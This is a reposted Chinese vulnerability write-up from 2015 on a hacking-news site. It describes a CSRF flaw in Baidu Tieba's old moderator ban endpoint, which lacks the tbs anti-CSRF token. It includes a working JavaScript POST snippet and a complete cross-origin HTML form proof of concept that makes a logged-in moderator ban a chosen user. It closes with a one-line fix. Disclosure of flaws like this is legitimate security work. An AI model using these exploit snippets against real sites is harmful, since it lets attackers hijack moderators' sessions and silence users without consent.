记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

百度贴吧封禁吧友csrf

2015-07-02 02:35

通过csrf借助吧主权限封禁吧友

首先“http://tieba.baidu.com/bawu/cm”这是老版本的吧务后台封禁接口,百度虽然早已改换为新版吧务后台,但是老版本的各种接口依然可以正常使用,由于老程序员的安全意识薄弱,导致虽然新版本的吧务后台看似csrf都做得不错,但是老版本的吧务后台依然可以正常调用里面的接口。


var c={ie:"utf-8",fid:PageData.forum.forum_id,"user_name":prompt("用户名"),ban_days:prompt("时长",1),word:PageData.forum.forum_name,cm:"filter_forum_user"};$.post("http://tieba.baidu.com/bawu/cm ",c,function(o){if(o.error.errmsg==""){alert("封禁成功");}else{alert("封禁失败:"+o.error.errmsg);}},"json");void 0





可以看出封禁需要向http://tieba.baidu.com/bawu/cm这个地址post如下几个参数即可。


ie:utf-8
fid:15309
user_name:昌维001
ban_days:1
word:it
cm:filter_forum_user


 

bawu1.png



其中fid为贴吧id,可以打开目标贴吧之后在f12的js控制点里面使用PageData.forum.forum_id命令获取,word为目标贴吧名称,ban_days为封禁天数,cm为固定的filter_forum_user,user_name为要封禁的人的id,可以看出并没有进行csrf防御用的tbs参数。具体证明看下面。

 

bawu2.png

 

bawu3.png

 

bawu4.png

 


<form action="http://tieba.baidu.com/bawu/cm" method="post">

<p>

ie:

<input name="ie" type="text" id="ie" value="utf-8" />

</p>

<p>fid:

<input name="fid" type="text" id="fid" value="15309" />

</p>

<p>user_name:

<input name="user_name" type="text" id="user_name" value="昌维001" />

</p>

<p>ban_days:

<input name="ban_days" type="text" id="ban_days" value="1" />

</p>

<p>word:

<input name="word" type="text" id="word" value="it" />

</p>

cm:

<input name="cm" type="text" id="cm" value="filter_forum_user" />

<p>

<input type="submit" name="button" id="button" />

by 昌维 </p>

</form>



如图所示,使用那个html可以在外域成功提交
 

解决方案:

要么把老接口都停用要么就加tbs吧。


知识来源: www.2cto.com/Article/201507/412837.html

阅读:120426 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“百度贴吧封禁吧友csrf”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云